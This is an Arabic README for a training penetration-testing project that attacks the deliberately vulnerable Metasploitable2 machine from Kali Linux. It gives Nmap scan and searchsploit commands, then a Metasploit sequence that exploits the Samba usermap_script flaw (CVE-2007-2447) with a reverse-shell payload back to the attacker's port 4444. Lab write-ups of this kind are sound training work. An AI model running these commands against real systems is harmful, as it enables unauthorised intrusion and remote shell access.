
مشروع اختبار اختراق عملي باستخدام Kali Linux ضد Metasploitable2. يتضمن سير العمل الكامل: فحص Nmap، التعداد، استغلال Metasploit (Samba CVE-2007-2447)، التحقق بعد الاستغلال، وخطوات التخفيف. يحتوي المستودع على الأوامر والمخرجات وتقرير يوضح كل من التقنيات الهجومية والتوصيات الدفاعية.
مشروع التدريب 2 — اختبار الاختراق على Metasploitable2
الملخص: يُظهر هذا المشروع سير عمل كامل لاختبار الاختراق: الاستطلاع، التعداد، الاستغلال، التحقق بعد الاستغلال، وتوصيات التخفيف. الهدف المستخدم هو Metasploitable2 وصندوق الهجوم هو Kali Linux.
الأدوات: Kali Linux (المهاجم) Nmap (الاستطلاع) Metasploit Framework (الاستغلال) SearchSploit / Exploit-DB (الفرز)
الخطوات المنفذة:
sudo nmap -sS -sV -p- -T4 --open -oA scans/target 192.168.x.x
الخدمات المحددة (أمثلة): vsftpd 2.3.4 (منفذ 21 بانر)، Samba smbd 3.x (منفذ 445).searchsploit --nmap scans/target.xml searchsploit samba 3.0.20
تم مطابقة الخدمات مع الثغرات المحتملة (باب خلفي لـ vsftpd، خريطة اسم المستخدم لـ Samba).msfconsole use exploit/multi/samba/usermap_script set RHOSTS 192.168.x.x set payload cmd/unix/reverse set LHOST <kali-ip> set LPORT 4444 exploit
تم الحصول على شل تفاعلي والتحقق من سياق المستخدم.id uname -aالنتيجة تم بنجاح الحصول على شل عن بعد عبر ثغرة Samba، وتوثيق مسار الهجوم، وإنتاج خطة تخفيف. السجلات الكاملة ومخرجات الأوامر مخزنة في مجلد scans/.